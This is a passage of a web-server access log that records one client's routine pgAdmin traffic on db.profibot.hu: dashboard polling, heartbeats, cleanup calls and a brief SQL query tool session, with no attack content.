(KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:48 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:19:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:20:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:20:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:20:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:20:18 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:20:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:20:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:21:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:21:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:21:33 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:21:35 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:37 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:21:39 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:40 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:41 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:42 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_tool/start/3857941" [Client 84.1.26.27] [Length 138] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:42 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 490] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:42 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/poll/3857941" [Client 84.1.26.27] [Length 359] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:42 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:42 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:21:44 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:46 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:48 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:21:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:21:48 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:50 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:52 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:08:21:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:21:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:14 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:18 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:48 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:22:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:23:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:23:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:24:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:24:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:25:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:25:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:26:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:26:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:27:14 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:27:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:27:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:28:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:28:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:29:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:29:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:30:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:30:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:31:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:31:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:32:14 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:32:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:08:32:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 